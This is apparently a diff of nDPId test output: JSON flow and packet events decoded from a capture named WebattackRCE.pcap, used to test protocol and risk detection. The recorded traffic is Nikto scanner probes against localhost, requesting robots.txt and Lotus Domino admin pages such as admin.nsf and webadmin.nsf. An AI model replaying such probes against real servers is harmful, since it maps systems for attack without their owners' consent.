-01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276742,"pkt":"AAAAAAAAAAAAAAAACABFAADJFcxAAEAGJmF\/AAABfwAAAcHyH5BqYy3sS9mo74AYAED+vQAAAQEICp1m+y6dZvsuR0VUIC9kb21jZmcubnNmIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RG9taW5vIGRldGVjdGlvbikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276743,"pkt":"AAAAAAAAAAAAAAAACABFAADIxjhAAEAGdfV\/AAABfwAAAcH0H5Bv5P4Yg+7934AYAED+vAAAAQEICp1m+y+dZvsvR0VUIC9hZG1pbi5uc2YgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRvbWlubyBkZXRlY3Rpb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276744,"pkt":"AAAAAAAAAAAAAAAACABFAADJ7atAAEAGToF\/AAABfwAAAcH2H5DjmNWMPF0CB4AYAED+vQAAAQEICp1m+zCdZvswR0VUIC9hZG1pbjQubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276745,"pkt":"AAAAAAAAAAAAAAAACABFAADJnTFAAEAGnvt\/AAABfwAAAcH4H5DLFKUODsXYX4AYAED+vQAAAQEICp1m+zGdZvsxR0VUIC9hZG1pbjUubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420276747,"pkt":"AAAAAAAAAAAAAAAACABFAADL46dAAEAGWIN\/AAABfwAAAcH6H5C6Q9uIEYxnOoAYAED+vwAAAQEICp1m+zOdZvsyR0VUIC93ZWJhZG1pbi5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276749,"pkt":"AAAAAAAAAAAAAAAACABFAADONl9AAEAGBcl\/AAABfwAAAcH8H5Dz0w5\/kxB3k4AYAED+wgAAAQEICp1m+zWdZvs1R0VUIC9ub25leGlzdGVudC5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276751,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ubFAAEAGgoV\/AAABfwAAAcH+H5C5FIGNENlwioAYAED+swAAAQEICp1m+zedZvs2R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpwYXJrZWQgZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 